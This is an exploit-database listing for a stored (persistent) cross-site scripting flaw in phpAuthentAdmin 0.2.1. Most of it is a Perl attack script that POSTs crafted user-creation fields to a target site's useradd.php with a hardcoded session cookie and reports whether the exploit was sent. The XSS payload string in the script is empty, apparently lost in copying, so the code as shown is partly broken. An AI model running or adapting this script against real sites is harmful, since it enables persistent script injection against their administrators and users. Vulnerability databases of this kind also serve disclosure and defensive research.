phpAuthentAdmin permanent XSS Vulnerability

🗓️ 22 Mar 2010 00:00:00Reported by YoyahackType

zdt🔗 0day.today👁 13 Views

phpAuthentAdmin permanent XSS vulnerability exploi

===========================================
phpAuthentAdmin permanent XSS Vulnerability
===========================================

# Exploit Title: phpAuthentAdmin  permanent XSS
# Author: Yoyahack
# Software Link: http://sourceforge.net/projects/phpauth/files/phpAuthent/phpAuthent%200.2.1/phpAuthent-0.2.1-20050828-116.zip/download
# Version: 0.2.1
# Tested on: linux
 
#Exploit:
 
#!/usr/bin/perl
#Autor: Yoyahack
#Web: http://undersecurity.net
#Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....
 
use LWP::UserAgent;
use HTTP::Request::Common;
 
#Source
 
print q(---------------------------------
Autor: Yoyahack
Web: http://undersecurity.net
Gretz: OzX, p0fk, S[e]C, ksha, seth, champloo, SH4V....
---------------------------------
);
 
if(!$ARGV[0]){
print "Insert web\n";
print "Ex: www.webpage.com<http://www.webpage.com>\n";
exit;
}
 
$xss = qq();
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.9.2.2pre)".
"Gecko/20100308 Ubuntu/9.10 (karmic) Namoroka/3.6.2pre");
 
$response = $ua->request(
   POST "http://$ARGV[0]/phpauthent/phpauthentadmin/useradd.php?action=create",
   {
   action => 'changerealname',
   name => $xss,
   action => 'rename',
   login => 'aaa',
   action=> 'password',
   password => 'XSS',
   action => 'changeemail',
   email => 'XSS',
   },
'Cookie' => 'PHPSESSID=cf1c170aa9d334d6cec1514e721573e6',
);
$loc = 'index.php?msg=001';
if($loc eq $response->header('location')){
print "\n\nExploit send!\n";
exit;
}
print "\n\nExploit Faield\n";



#  0day.today [2018-01-10]  #

22 Mar 2010 00:00Current

7.1High risk

Vulners AI Score7.1